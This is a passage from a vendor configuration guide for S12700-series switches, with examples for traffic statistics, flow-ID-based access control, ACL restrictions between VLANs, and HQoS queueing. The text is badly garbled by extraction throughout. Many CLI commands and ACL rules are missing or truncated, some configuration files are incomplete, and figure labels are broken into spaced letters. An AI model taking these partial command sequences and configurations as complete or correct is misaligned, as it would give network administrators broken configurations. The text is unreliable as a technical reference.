rule 5 permit icmp source 10.1.2.10 0 destination 10.1.1.1 0
#
if-match acl 3001
if-match acl 3002
#
traffic behavior b1
permit
statistic enable
traffic behavior b2
permit
statistic enable
#
#
traffic-policy p2 outbound
#


traffic-policy p1 outbound
#
return
17.10 Example for Configuring a Traffic Policy to

Implement Traffic Statistics
Overview
After MQC is used to implement traffic statistics, the device collects statistics on packets and
bytes of packets matching traffic classification rules. The statistics on forwarded and
discarded packets after a traffic policy is applied help you check whether the traffic policy is
correctly applied and locate faults.
Interface-based traffic statistics in the inbound and outbound directions can be configured
simultaneously or separately. The device collects traffic statistics in the inbound and outbound
directions separately.
Configuration Notes

S12700 S12708 and S12712 V200R005C00, V200R006C00,

V200R007C00, V200R007C20,
V200R008C00, V200R009C00
S12704 V200R008C00, V200R009C00
NOTE
VLAN 20, respectively. The network administrator wants to determine whether the host at
192.168.2.200/24 in VLAN 20 can access the server at 192.168.1.100/24 in VLAN 10.
Figure 17-10 Configuring a traffic policy to implement traffic statistics

VLAN 10
192.168.1.0/24 GE1/0/1 10.1.20.1/24
GE0/0/3 GE1/0/2
Network
GE1/0/1
VLAN 20 GE1/0/2
192.168.2.0/24


Interface

1/0/1
1/0/2
GigabitEthernet VLAN 10 and - -

1/0/3 VLAN 20

1/0/1 VLAN 20 and VLANIF 192.168.1.1/24
20 VLANIF 20:
192.168.2.1/24

1/0/2
interworking.
2. Configure an ACL on the Switch to match specified traffic.
4. Configure a traffic behavior on the Switch to collect statistics on matched packets.
and traffic behavior, and apply the traffic policy to GE1/0/1 connected to SwitchA in the
inbound direction.
Procedure
[Switch] vlan batch 10 20 30 //Create VLAN 10, VLAN 20, and VLAN 30.
interface to trunk.
30.


segment 192.168.1.0/24.
10.
interface to trunk.

switch.
# Configure an ACL rule on the Switch to match traffic with the source IP address of
192.168.2.200 and destination IP address of 192.168.1.100.
[Switch] acl 3000
192.168.1.100 0.0.0.0


# Configure a traffic behavior on the Switch and define the traffic statistics action in the
traffic behavior.

SwitchA.

Acl's step is 5
rule 5 permit ip source 192.168.2.200 0 destination 192.168.1.100 0 (match-
counter 0)

Policy: p1
Classifier: c1
Operator: AND
Behavior: b1
Permit
Statistic: enable
# Check the traffic statistics.

Interface:
Rule number: 1
Current status:
success
---------------------------------------------------------------------
Board : 1
---------------------------------------------------------------------
| Bytes: 0
| Rate(pps): 0
| Rate(bps): 0
---------------------------------------------------------------------
Passed | Packets: 0
| Bytes: 0
| Rate(pps): 0
| Rate(bps): 0
---------------------------------------------------------------------
| Bytes: 0
| Rate(pps): 0
| Rate(bps): 0
---------------------------------------------------------------------
Filter | Packets: 0
| Bytes: 0
---------------------------------------------------------------------
Car | Packets: 0
| Bytes: 0

---------------------------------------------------------------------
Matched indicates the numbers of packets and bytes matching the traffic classifier, and
Passed indicates the numbers of forwarded packets and bytes matching the traffic classifier. If
the values of Matched and Passed are not 0, the host at 192.168.2.200 in VLAN 20 has
accessed the server at 192.168.1.100 in VLAN 10.
----End
Configuration Files
#
sysname Switch
#
vlan batch 10 20 30
#
acl number 3000
rule 5 permit ip source 192.168.2.200 0 destination 192.168.1.100 0
#
if-match acl 3000
#
traffic behavior b1
permit
statistic enable
#
#
interface Vlanif10
ip address 192.168.1.1 255.255.255.0
#
interface Vlanif20
ip address 192.168.2.1 255.255.255.0
#
interface Vlanif30
ip address 10.1.20.2 255.255.255.0
#
#
#
ip route-static 0.0.0.0 0.0.0.0 10.1.20.1
#
return

#
sysname SwitchA
#
vlan batch 10 20
#
#
#

#
return
17.11 Example for Limiting Access Based on the Flow ID
Overview of the Flow ID

When the same traffic classification rules need to be configured and the same action needs to
be taken for packets that match the traffic classification rules on different interfaces or in
different VLANs, to save ACL resources, configure the device to classify packets based on
ACL rules, to re-mark the flow ID of each type of packets, and then to classify packets based
on the flow ID and to process packets matching the same flow ID in the same manner.
Assume that M ACLs are configured on the device to distinguish services, and each ACL
contains N ACL rules. Traffic classifiers classify packets based on ACL rules, and the traffic
policy containing the ACL rules are applied to X interfaces. If the action of re-marking flow
IDs and matching rules based on the flow IDs are not configured, applying the traffic policy
occupies M*N*X ACL resources. If the action of re-marking flow IDs and matching rules
based on flow IDs are configured, applying the traffic policy occupies only M*(N+X) ACL
resources.
In this example, the device is configured to re-mark flow IDs of packets matching ACL rules,
to classify packets based on flow IDs, and to permit or deny packets matching rules to limit
the access.
Configuration Notes

S12700 S12708 and S12712 V200R008C00, V200R009C00
S12704 V200R008C00, V200R009C00
NOTE
As shown in Figure 17-11, the Switch connects to SwitchA, and SwitchA connect to the
router. Guests can connect to the enterprise network in guest areas of office buildings 1, 2, and
3. Guests can access the public file server and the Internet, but cannot access the confidential
file server and financial department server.

Figure 17-11 Networking of traffic policing
C o n fid e n tia l file se rve r E xte rn a l file se rve r

1 0 .1 .5 .0 /2 4 1 0 .1 .6 .0 /2 4
G u e st a re a o f
o ffice b u ild in g 1
1 0 .1 .1 .0 /2 4
G u e st a re a o f
o ffice b u ild in g 2 G E 1 /0 /1
G E 1 /0 /2 G E 1 /0 /3
1 0 .1 .2 .0 /2 4
G E 1 /0 /2 G E 1 /0 /4 G E 1 /0 /5 In te rn e t
G u e st a re a o f S w itch G E 1 /0 /1 S w itch A R o u te r
o ffice b u ild in g 3
G E 1 /0 /3 G E 1 /0 /4
1 0 .1 .3 .0 /2 4
F in a n cia l d e p a rtm e n t
E n te rp rise se rve r 1 0 .1 .7 .0 /2 4
ca m p u s n e tw o rk T ra ffic
d ire ctio n

Interface
Switch GigabitEthernet VLAN 10 VLANIF 10 10.1.1.1/24

1/0/1

1/0/2

1/0/3

1/0/4
SwitchA GigabitEthernet VLAN 40 VLANIF 40 10.1.4.2/24

1/0/1

1/0/2

1/0/3

1/0/4

1/0/5

1. Create VLANs, and configure interfaces and a routing protocol so that the enterprise can
access the Internet.
2. Configure ACLs on the Switch to match packets from guest areas.
3. Configure traffic classifiers on the Switch to classify packets based on ACLs.
4. Configure traffic behaviors on the Switch to re-mark flow IDs of packets matching
ACLs.
5. Configure a traffic policy that contains flow ID re-marking on the Switch, bind the traffic
behaviors and traffic classifiers to the traffic policy, and apply the traffic policy to the
Switch globally in the inbound direction.
6. Configure traffic classifiers on the Switch to classify packets from guest areas based on
flow IDs.
7. Configure traffic behaviors on the Switch to permit or reject packets from guest areas to
implement access control.
8. Configure a traffic policy for access control on the Switch, bind the traffic behaviors and
traffic classifiers to the traffic policy, and apply the traffic policy to the interfaces on the
Switch connected to guest areas in the inbound direction.
Procedure
Step 1 Create VLANs, and configure interfaces and a routing protocol (the static route is used here).
# Configure the Switch.
[Switch-GigabitEthernet1/0/1] port link-type access //Configure the interface as
an access interface.
[Switch-GigabitEthernet1/0/4] port link-type trunk //Configure the interface as
a trunk interface.
[Switch-GigabitEthernet1/0/4] port trunk allow-pass vlan 10 20 30 40
for the VLANIF interface.

[Switch] ip route-static 10.1.5.0 255.255.255.0 10.1.4.2 //Configure a static
route.
[Switch] ip route-static 10.1.6.0 255.255.255.0 10.1.4.2
[SwitchA] vlan batch 40 50 60 70 80 //Create VLAN 40 to VLAN 80.
[SwitchA-GigabitEthernet1/0/1] port link-type trunk //Configure the interface as
a trunk interface.
[SwitchA-GigabitEthernet1/0/1] port trunk allow-pass vlan 40 50 60 70 80
as an access interface.
[SwitchA] interface vlanif 40 //Create a VLANIF interface.
[SwitchA-Vlanif40] ip address 10.1.4.2 255.255.255.0 //Configure an IP address
for the VLANIF interface.
[SwitchA] ip route-static 10.1.1.0 255.255.255.0 10.1.4.1 //Configure a static
route.

# Configure an ACL rule to match packets sent from the guest area to the confidential file
server.
[Switch] acl name non-access-file
[Switch-acl-adv-non-access-file] rule permit tcp destination 10.1.5.0 0.0.0.255
destination-port eq 20 //Configure a rule to permit FTP data packets sent from
the guest area to the confidential file server.
[Switch-acl-adv-non-access-file] rule permit tcp destination 10.1.5.0 0.0.0.255
destination-port eq 21 //Configure a rule to permit FTP protocol packets sent
from the guest area to the confidential file server.
[Switch-acl-adv-non-access-file] quit

# Configure an ACL rule to match packets sent from the guest area to the financial
department server.
[Switch] acl name non-access-finance
[Switch-acl-adv-non-access-finance] rule permit tcp destination 10.1.7.0
0.0.0.255 destination-port eq 20 //Configure a rule to permit FTP data packets
sent from the guest area to the financial department server.
[Switch-acl-adv-non-access-finance] rule permit tcp destination 10.1.7.0
0.0.0.255 destination-port eq 21 //Configure a rule to permit FTP protocol
packets sent from the guest area to the financial department server.
[Switch-acl-adv-non-access-finance] quit
# Configure an ACL rule to match packets sent from the guest area to the public file server.
[Switch] acl name access-file
[Switch-acl-adv-access-file] rule permit tcp destination 10.1.6.0 0.0.0.255
destination-port eq 20 //Configure a rule to permit FTP data packets sent from
the guest area to the public file server.
[Switch-acl-adv-access-file] rule permit tcp destination 10.1.6.0 0.0.0.255
destination-port eq 21 //Configure a rule to permit FTP protocol packets sent
from the guest area to the public file server.
[Switch-acl-adv-access-file] quit
# Configure an ACL rule to match packets sent from the guest area to the external network.
[Switch] acl name access-internet
[Switch-acl-adv-access-internet] rule permit tcp destination-port eq 80
[Switch-acl-adv-access-internet] quit

# Configure traffic classifiers on the Switch to classify packets from guest areas based on
ACLs.
[Switch] traffic classifier non-access-file operator and
[Switch-classifier-non-access-file] if-match acl non-access-file //Configure the
device to match packets sent from the guest area to the confidential file server.
[Switch-classifier-non-access-file] quit
[Switch] traffic classifier non-access-finance operator and
[Switch-classifier-non-access-finance] if-match acl non-access-finance //
Configure the device to match packets sent from the guest area to the financial
department server.
[Switch-classifier-non-access-finance] quit
[Switch] traffic classifier access-file operator and
[Switch-classifier-access-file] if-match acl access-file //Configure the device
to match packets sent from the guest area to the public file server.
[Switch-classifier-access-file] quit
[Switch] traffic classifier access-internet operator and
[Switch-classifier-access-internet] if-match acl access-internet //Configure the
device to match packets sent from the guest area to the external network.
[Switch-classifier-access-internet] quit

# Create traffic behaviors on the Switch to re-mark flow IDs of packets.
[Switch] traffic behavior non-access-file
[Switch-behavior-non-access-file] remark flow-id 1 //Configure the device to re-
mark the flow ID of packets sent from the guest area to the confidential file
server with 1.
[Switch-behavior-non-access-file] quit
[Switch] traffic behavior non-access-finance
[Switch-behavior-non-access-finance] remark flow-id 2 //Configure the device to
re-mark the flow ID of packets sent from the guest area to the financial
department server with 2.
[Switch-behavior-non-access-finance] quit
[Switch] traffic behavior access-file
[Switch-behavior-access-file] remark flow-id 3 //Configure the device to re-mark
the flow ID of packets sent from the guest area to the public file server with 3.
[Switch-behavior-access-file] quit
[Switch] traffic behavior access-internet
[Switch-behavior-access-internet] remark flow-id 4 //Configure the device to re-

mark the flow ID of packets sent from the guest area to the external network with
4.
[Switch-behavior-access-internet] quit
Step 5 Configure a traffic policy that contains flow ID re-marking and apply the traffic policy
globally in the inbound direction.
# Create the traffic policy flow-id on the Switch, bind the traffic classifiers and traffic
behaviors to the traffic policy, and apply the traffic policy globally in the inbound direction.
[Switch] traffic policy flow-id
[Switch-trafficpolicy-flow-id] classifier non-access-file behavior non-access-file
[Switch-trafficpolicy-flow-id] classifier non-access-finance behavior non-access-
finance
[Switch-trafficpolicy-flow-id] classifier access-file behavior access-file
[Switch-trafficpolicy-flow-id] classifier access-internet behavior access-internet
[Switch-trafficpolicy-flow-id] quit
[Switch] traffic-policy flow-id global inbound
# Configure traffic classifiers on the Switch to classify packets from guest areas based on flow
IDs.
[Switch] traffic classifier flow-id1 operator and
[Switch-classifier-flow-id1] if-match flow-id 1 //Configure the device to match
packets with the flow ID of 1, that is, packets sent from the guest area to the
confidential file server.
[Switch-classifier-flow-id1] quit
financial department server.
public file server.
external network.
# Create traffic behaviors on the Switch to permit or reject matching packets.

[Switch] traffic behavior flow-id1
[Switch-behavior-flow-id1] deny //Configure the device to reject packets with
the flow ID of 1.
[Switch-behavior-flow-id1] quit
[Switch-behavior-flow-id2] deny //Configure the device to reject packets with
the flow ID of 2.
[Switch-behavior-flow-id3] permit //Configure the device to permit packets with
the flow ID of 3 to pass through.
[Switch-behavior-flow-id4] permit //Configure the device to permit packets with
the flow ID of 4 to pass through.
Step 8 Configure a traffic policy for access control and apply the traffic policy to an interface.

# Create the traffic policy access_policy on the Switch, bind the traffic behaviors and traffic
classifiers to the traffic policy, and apply the traffic policy to GE1/0/1, GE1/0/2, and GE1/0/3
in the inbound direction to limit access of guest areas.
[Switch] traffic policy access_policy
[Switch-trafficpolicy-access_policy] classifier flow-id1 behavior flow-id1
[Switch-trafficpolicy-access_policy] quit
[Switch-GigabitEthernet1/0/1] traffic-policy access_policy inbound

Advanced ACL access-internet 3996, 1 rule

Acl's step is 5
rule 5 permit tcp destination-port eq www (match-counter 0)
Advanced ACL access-file 3997, 2 rules

Acl's step is 5
rule 5 permit tcp destination 10.1.6.0 0.0.0.255 destination-port eq ftp-data
(match-counter 0)
rule 10 permit tcp destination 10.1.6.0 0.0.0.255 destination-port eq ftp (match-
counter 0)
Advanced ACL non-access-finance 3998, 2 rules

Acl's step is 5
(match-counter 0)
counter 0)
Advanced ACL non-access-file 3999, 2 rules

Acl's step is 5
(match-counter 0)
counter 0)

Classifier: flow-id1
Precedence: 25
Operator: AND
Rule(s) : if-match flow-id 1
Precedence: 30
Operator: AND
Precedence: 35
Operator: AND

Precedence: 40
Operator: AND
Classifier: non-access-file
Precedence: 5
Operator: AND
Rule(s) : if-match acl non-access-file
Classifier: non-access-finance
Precedence: 10
Operator: AND
Rule(s) : if-match acl non-access-finance
Classifier: access-file
Precedence: 15
Operator: AND
Rule(s) : if-match acl access-file
Classifier: access-internet
Precedence: 20
Operator: AND
Rule(s) : if-match acl access-internet

Policy: flow-id
Classifier: non-access-file
Operator: AND
Behavior: non-access-file
Permit
Remark:
Remark flow-id 1
Classifier: non-access-finance
Operator: AND
Behavior: non-access-finance
Permit
Remark:
Remark flow-id 2
Classifier: access-file
Operator: AND
Behavior: access-file
Permit
Remark:
Remark flow-id 3
Classifier: access-internet
Operator: AND
Behavior: access-internet
Permit
Remark:
Remark flow-id 4
Policy: access_policy
Operator: AND
Behavior: flow-id1
Deny
Operator: AND
Behavior: flow-id2
Deny
Operator: AND

Behavior: flow-id3
Permit
Operator: AND
Behavior: flow-id4
Permit
----End
Configuration Files
#
sysname Switch
#
#
acl name access-internet 3996
rule 5 permit tcp destination-port eq www
acl name access-file 3997
rule 10 permit tcp destination 10.1.6.0 0.0.0.255 destination-port eq ftp
acl name non-access-finance 3998
acl name non-access-file 3999
#
traffic classifier access-file operator and precedence 15
if-match acl access-file
traffic classifier access-internet operator and precedence 20
if-match acl access-internet
traffic classifier flow-id1 operator and precedence 25
if-match flow-id 1
if-match flow-id 2
if-match flow-id 3
if-match flow-id 4
traffic classifier non-access-file operator and precedence 5
if-match acl non-access-file
traffic classifier non-access-finance operator and precedence 10
if-match acl non-access-finance
#
traffic behavior access-file
permit
remark flow-id 3
traffic behavior access-internet
permit
remark flow-id 4
traffic behavior flow-id1
deny
deny
permit
permit
traffic behavior non-access-file
permit
remark flow-id 1
traffic behavior non-access-finance
permit
remark flow-id 2

#
traffic policy access_policy match-order config
classifier flow-id1 behavior flow-id1
traffic policy flow-id match-order config
classifier non-access-file behavior non-access-file
classifier non-access-finance behavior non-access-finance
classifier access-file behavior access-file
classifier access-internet behavior access-internet
#
interface Vlanif10
ip address 10.1.1.1 255.255.255.0
#
interface Vlanif20
ip address 10.1.2.1 255.255.255.0
#
interface Vlanif30
ip address 10.1.3.1 255.255.255.0
#
interface Vlanif40
ip address 10.1.4.1 255.255.255.0
#
traffic-policy access_policy inbound
#
#
#
port trunk allow-pass vlan 10 20 30 40
#
ip route-static 10.1.5.0 255.255.255.0 10.1.4.2
ip route-static 10.1.6.0 255.255.255.0 10.1.4.2
ip route-static 10.1.7.0 255.255.255.0 10.1.4.2
ip route-static 10.1.8.0 255.255.255.0 10.1.4.2
#
traffic-policy flow-id global inbound
#
return
#
sysname SwitchA
#
vlan batch 40 50 60 70 80
#
interface Vlanif40
ip address 10.1.4.2 255.255.255.0
#
interface Vlanif50
ip address 10.1.5.1 255.255.255.0
#
interface Vlanif60
ip address 10.1.6.1 255.255.255.0
#
interface Vlanif70
ip address 10.1.7.1 255.255.255.0
#

interface Vlanif80
ip address 10.1.8.1 255.255.255.0
#
port trunk allow-pass vlan 40 50 60 70 80
#
#
#
#
#
ip route-static 10.1.1.0 255.255.255.0 10.1.4.1
ip route-static 10.1.2.0 255.255.255.0 10.1.4.1
ip route-static 10.1.3.0 255.255.255.0 10.1.4.1
#
return
17.12 Example for Configuring a Traffic Policy to Limit

Access Between Network Segments
Overview
Modular QoS Command-Line Interface (MQC) allows the device to classify traffic of a
certain type so that the device can provide the same service for packets of the same type and
differentiated services for packets of different types.
An advanced ACL can use the source and destination IP addresses to define the data flows
that are permitted or rejected. A traffic classifier references an ACL to classify packets, and
the permit or deny action is specified to process matched packets. Here, MQC is used to
implement access control between network segments.
Configuration Notes

S12700 S12708 and S12712 V200R005C00, V200R006C00,

V200R007C00, V200R007C20,
V200R008C00, V200R009C00
S12704 V200R008C00, V200R009C00
NOTE

An ACL is often used with a traffic policy. A traffic policy is bound to the traffic classifier
matching an ACL and the traffic behavior such as permit/deny associated with the traffic
classifier.
The permit/deny actions in an ACL and a traffic behavior in the traffic policy are used as
follows.
ACL Traffic Behavior in the Final Action Taken for

Traffic Policy Matched Packets
permit permit permit
permit deny deny
deny permit deny
deny deny deny
A switch permits packets by default. To reject packets between network segments, define the
packets to be rejected in the ACL. If the rule permit command is used, all packets match this
rule. If the traffic behavior defines the deny action, the switch filters all packets, causing
service interruptions.
As shown in Figure 17-12, the company has three departments that belong to VLAN 10,
VLAN 20, and VLAN 30, respectively. To ensure security, users in VLAN 10 access only
VLAN 20 but not VLAN 30. The three departments need to access the Internet, and there are
no other limitations.
Figure 17-12 Access control between network segments

VLAN 10
192.168.1.0/24
GE1/0/1 10.1.20.1/24
VLAN 20 GE1/0/2 GE1/0/4 GE1/0/2
192.168.2.0/24 Network
GE1/0/1
GE1/0/3 SwitchA Switch Router
VLAN 30
192.168.3.0/24

Interface

1/0/1


Interface
1/0/2
1/0/3
GigabitEthernet VLAN 10, - -

1/0/4 VLAN 20, and
VLAN 30
Switch GigabitEthernet VLAN 10, VLANIF 10, VLANIF 10:

1/0/1 VLAN 20, and VLANIF 20, 192.168.1.1/24
VLAN 30 and VLANIF VLANIF 20:
30 192.168.2.1/24
VLANIF 30:
192.168.3.1/24

1/0/2
2. Configure ACL rules on the Switch to define the data flows that are permitted or
rejected.
4. Configure a traffic behavior on the Switch and define the permit action (the ACL defines
the data flows that are rejected).
and traffic behavior, and apply the traffic policy to GE1/0/1
Procedure
Step 1 Create VLANs, and configure interfaces and a routing protocol.
interface to trunk.
[Switch-GigabitEthernet1/0/1] port trunk allow-pass vlan 10 20 30 //Add the
interface to VLAN 10, VLAN 20, and VLAN 30.

40.
segment 192.168.1.0/24.
[SwitchA] vlan batch 10 20 30 //Create VLAN 10 to VLAN 30.
10.
interface to trunk.
[SwitchA-GigabitEthernet1/0/4] port trunk allow-pass vlan 10 20 30

Switch.
# Configure ACL rules on the Switch to define the data flows that are permitted or rejected.
[Switch] acl 3000
192.168.3.0 0.0.0.255 //Configure an ACL rule to reject data flows from VLAN 10
to VLAN 30.
192.168.2.0 0.0.0.255 //Configure an ACL rule to permit data flows from VLAN 10
and VLAN 20.
[Switch-acl-adv-3000] rule permit ip source any //If there are many internal
network segments, configure an ACL to permit any data flows.




# Configure a traffic behavior on the Switch and define the permit action.
SwitchA.

Acl's step is 5
(match-counter 0)
(match-counter 0)
rule 15 permit ip (match-counter 0)

Policy: p1
Classifier: c1
Operator: AND
Behavior: b1
Permit
# User devices on network segment 192.168.1.0/24 can ping user devices on network segment
192.168.2.0/24, that is, users in VLAN 10 can access users in VLAN 20.
# User devices on network segment 192.168.1.0/24 cannot ping user devices on network
segment 192.168.3.0/24, that is, users in VLAN 10 cannot access users in VLAN 30.
# Users devices on network segments 192.168.1.0/24, 192.168.2.0/24, and 192.168.3.0/24 can
ping the IP address 10.1.20.1/24 of the interface on the router, indicating that users of the
three departments can access the Internet.
----End
Configuration Files
#
sysname Switch
#

#
acl number 3000
0.0.0.255
rule 15 permit ip
#
if-match acl 3000
#
traffic behavior b1
permit
#
#
interface Vlanif10
ip address 192.168.1.1 255.255.255.0
#
interface Vlanif20
ip address 192.168.2.1 255.255.255.0
#
interface Vlanif30
ip address 192.168.3.1 255.255.255.0
#
interface Vlanif40
ip address 10.1.20.2 255.255.255.0
#
#
#
ip route-static 0.0.0.0 0.0.0.0 10.1.20.1
#
return
#
sysname SwitchA
#
vlan batch 10 20 30
#
#
#
#
#
return
17.13 Example for Configuring HQoS

Overview of HQoS
HQoS uses multiple levels of queues to further differentiate service traffic, and provides
uniform management and hierarchical scheduling for transmission objects such as users and
services. HQoS enables network devices to control internal resources with the existing
hardware, providing QoS guarantee for advanced users while reducing network construction
cost.
The switch uses flow and subscriber queues to implement HQoS.
Configuration Notes
Only X1E series cards support this configuration.
support this configuration.

S12700 S12708 and S12712 V200R005C00, V200R006C00,

V200R007C00, V200R007C20,
V200R008C00, V200R009C00
S12704 V200R008C00, V200R009C00
NOTE
Voice, video, and data services from multiple users are transmitted on an enterprise campus
network, and 802.1p priorities of voice, video, and data services are 6, 5, and 2 respectively.
Bandwidth needs to be guaranteed for the voice, video, and data services in descending order
of priority. Table 17-17 and Table 17-18 describe the configuration requirements.
Because the bandwidth is finite, the device needs to differentiate service priorities and shape
traffic from different users to provide different bandwidth. Table 17-19 describes the
configuration requirement.
Table 17-17 Congestion avoidance parameters of flow queues

Service Type Color Lower Drop Upper Drop Maximum
Threshold (%) Threshold (%) Drop
Probability
Voice Green 80 100 10
Video Yellow 60 80 20
Data Red 40 60 40

Table 17-18 Congestion management parameters of flow queues
Service Type CoS Value
Voice EF
Video AF3
Data AF1
Table 17-19 Traffic shaping parameters of subscriber queues
User PIR
Users in VLAN 10 8000 kbit/s
Users in VLAN 20 5000 kbit/s
Figure 17-13 HQoS networking
V id e o , d a ta , vo ice
T ra ffic d ire ctio n

G E 1 /0 /1
U se r 1
G E 1 /0 /2
V id e o , d a ta , vo ice G E 2 /0 /1
S w itc h A
VLAN 10 G E 1 /0 /1 G E 2 /0 /1
U se r 2 G E 1 /0 /1
In te rn e t
G E 1 /0 /2 G E 2 /0 /1
V id e o , d a ta , vo ice S w itc h S w itc h C R o u te r
G E 1 /0 /1
U se r 3 G E 2 /0 /1
G E 1 /0 /2
V id e o , d a ta , vo ice S w itc h B
VLAN 20
U se r 4
1. Create VLANs and configure interfaces so that the enterprise can access the Internet
through the Switch.
2. Create a DiffServ domain on the Switch to map 802.1p priorities of different service
packets to PHBs and colors, and bind the DiffServ domain to the inbound interface of the
Switch.
3. Configure a flow queue WRED drop profile, flow queue profile, and profile parameters
on the Switch so that the Switch provides different scheduling priorities, drop profile
parameters, and traffic shaping parameters for different services.

4. Configure ACLs on the Switch to differentiate service traffic of different users based on
VLAN IDs.
5. Configure subscriber queues and traffic shaping parameters on the Switch, and reference
the flow queue WRED drop profile and flow queue profile to implement HQoS.
Procedure
# Create VLAN 10 on SwitchA, configure GE1/0/1 and GE1/0/2 as access interfaces and add
them to VLAN 10, and configure GE2/0/1 as a trunk interface and add it to VLAN 10.
# Create VLAN 20 on SwitchB, configure GE1/0/1 and GE1/0/2 as access interfaces and add
them to VLAN 20, and configure GE2/0/1 as a trunk interface and add it to VLAN 20.
[SwitchB-GigabitEthernet1/0/1] port link-type access
[SwitchB-GigabitEthernet1/0/1] port default vlan 20
[SwitchB-GigabitEthernet1/0/2] port link-type access
# Create VLAN 10 and VLAN 20 on SwitchC, configure GE1/0/1 as a trunk interface and add
it to VLAN 10 and VLAN 20, and configure GE2/0/1 as a trunk interface and add it to VLAN
10 and VLAN 20.
[SwitchC] vlan batch 10 20
# Create VLAN 10 and VLAN 20 on the Switch, configure GE1/0/1, GE1/0/2, and GE2/0/1
as trunk interfaces, and add GE1/0/1 to VLAN 10, GE1/0/2 to VLAN 20, and GE2/0/1 to


# Create a DiffServ domain ds1 to map 802.1p priorities 6, 5, 2 to EF, AF3, and AF1 and
color packets green, yellow, and red.
[Switch-dsdomain-ds1] 8021p-inbound 6 phb ef green //Create a DiffServ domain to
map 802.1p priorities of different service packets to PHBs so that packets enter
different queues.
[Switch-dsdomain-ds1] 8021p-inbound 5 phb af3 yellow
[Switch-dsdomain-ds1] 8021p-inbound 2 phb af1 red
# Bind the DiffServ domain to GE1/0/1 and GE1/0/2 on the Switch.

the interface.
the interface.
Step 3 Configure a flow queue WRED drop profile and define parameters in the profile.
# Create a flow queue WRED drop profile named wred1 on the Switch and set parameters of
green, yellow, and red packets in the flow queue WRED drop profile.
[Switch] flow-wred-profile wred1 //Configure a WRED drop profile.
[Switch-flow-wred-wred1] color green low-limit 80 high-limit 100 discard-
percentage 10 //Configure a WRED drop profile, and set the upper and lower drop
threshold and maximum drop probability for green packets.
[Switch-flow-wred-wred1] color yellow low-limit 60 high-limit 80 discard-
percentage 20 //When the percentage of the yellow packet length to the queue
length reaches 60%, the device starts to discard packets with the maximum drop
probability of 20%. When the percentage of the yellow packet length to the queue
length reaches 80%, the device discards all new packets.
[Switch-flow-wred-wred1] color red low-limit 40 high-limit 60 discard-percentage
40
[Switch-flow-wred-wred1] quit
Step 4 Configure a flow queue profile and define parameters in the profile.
# Configure a flow queue profile named flow1 on the Switch, bind flow queue profile flow1
to flow queue WRED drop profile wred1, and configure different scheduling parameters.
[Switch] flow-queue-profile flow1 //Configure a flow queue profile.
[Switch-flow-queue-flow1] qos queue 5 pq flow-wred-profile wred1 //Configure PQ

scheduling for queue 5 and reference the WRED drop profile wred1.
[Switch-flow-queue-flow1] qos queue 3 wfq weight 20 flow-wred-profile wred1 //
Configure WFQ scheduling for queue 3, set the WFQ weight to 20, and reference the
WRED drop profile wred1.
[Switch-flow-queue-flow1] qos queue 1 wfq weight 10 flow-wred-profile wred1 //
Configure WFQ scheduling for queue 1, set the WFQ weight to 10, and reference the
WRED drop profile wred1.
[Switch-flow-queue-flow1] quit

# Configure ACL 4001 and ACL 4002 on the Switch, and configure ACL rules based on
[Switch-acl-L2-4001] rule 1 permit vlan-id 10 //Configure an ACL rule to match
[Switch-acl-L2-4002] rule 1 permit vlan-id 20 //Configure an ACL rule to match
Step 6 Configure subscriber queues and parameters.
# Configure subscriber queues based on ACL 4001 and ACL 4002 on the Switch and
reference flow queue profile flow1.
[Switch-GigabitEthernet2/0/1] traffic-user-queue outbound acl 4001 pir 8000 flow-
queue-profile flow1 //Create a subscriber queue that references ACL 4001, set
the PIR to 8000 kbit/s, and refernece the flow queue flow1.
[Switch-GigabitEthernet2/0/1] traffic-user-queue outbound acl 4002 pir 5000 flow-
queue-profile flow1 //Create a subscriber queue that references ACL 4002, set
the PIR to 5000 kbit/s, and refernece the flow queue flow1.
[Switch] quit
# Check the configuration of the WRED drop profile of a flow queue, including the profile
name, upper and lower drop thresholds of green, yellow, and red packets, and maximum drop
probability.
<Switch> display flow-wred-profile name wred1
Flow-wred-profile[1]: wred1
Queue depth : 1048576
Color Low-limit High-limit Discard-percentage
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Green 80 100 10
Yellow 60 80 20
Red 40 60 40
-----------------------------------------------------------------
# Check the flow queue profile configuration, including the profile name and WFQ weights.
<Switch> display flow-queue-profile name flow1
Flow-queue-profile[1]: flow1
Queue Schedule(Weight) Shaping flow-wred-profile
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
0 PQ None default
1 WFQ(10) None wred1
2 PQ None default
3 WFQ(20) None wred1
4 PQ None default
5 PQ None wred1
6 PQ None default
7 PQ None default
-----------------------------------------------------------------------

# Check traffic statistics on subscriber queues.

<Switch> display traffic-user-queue statistics interface gigabitethernet 2/0/1
outbound acl 4001
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
Queue ID | Statistics
information
--------------------------------------------------------------------------------
0 | packets: pass:
4,127
| drop:
2,798,787,076
| bytes: pass:
610,796
| drop:
414,220,487,248
--------------------------------------------------------------------------------
information
--------------------------------------------------------------------------------
1 | packets: pass:
4,127
| drop:
5,597,436,717
| bytes: pass:
610,796
| drop:
828,420,634,116
--------------------------------------------------------------------------------
information
--------------------------------------------------------------------------------
2 | packets: pass:
0
| drop:
0
| bytes: pass:
0
| drop:
0
--------------------------------------------------------------------------------
information
--------------------------------------------------------------------------------
3 | packets: pass:
4,127
| drop:
5,597,436,713
| bytes: pass:
610,796
| drop:
828,420,633,524
--------------------------------------------------------------------------------
information
--------------------------------------------------------------------------------
4 | packets: pass:
4,127

| drop:
2,798,716,293
| bytes: pass:
610,796
| drop:
414,210,011,364
--------------------------------------------------------------------------------
information
--------------------------------------------------------------------------------
5 | packets: pass:
4,127
| drop:
2,798,716,294
| bytes: pass:
610,796
| drop:
414,210,011,512
--------------------------------------------------------------------------------
information
--------------------------------------------------------------------------------
6 | packets: pass:
0
| drop:
0
| bytes: pass:
0
| drop:
0
--------------------------------------------------------------------------------
information
--------------------------------------------------------------------------------
7 | packets: pass:
1,119,509,460
| drop:
1,679,210,961
| bytes: pass:
165,687,400,080
| drop:
248,523,222,228
--------------------------------------------------------------------------------
<Switch> display traffic-user-queue statistics interface gigabitethernet 2/0/1

outbound acl 4002
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
information
--------------------------------------------------------------------------------
0 | packets: pass:
4,125
| drop:
5,218,026
| bytes: pass:
610,500
| drop:
772,267,848
--------------------------------------------------------------------------------

information
--------------------------------------------------------------------------------
1 | packets: pass:
4,125
| drop:
10,440,178
| bytes: pass:
610,500
| drop:
1,545,146,344
--------------------------------------------------------------------------------
information
--------------------------------------------------------------------------------
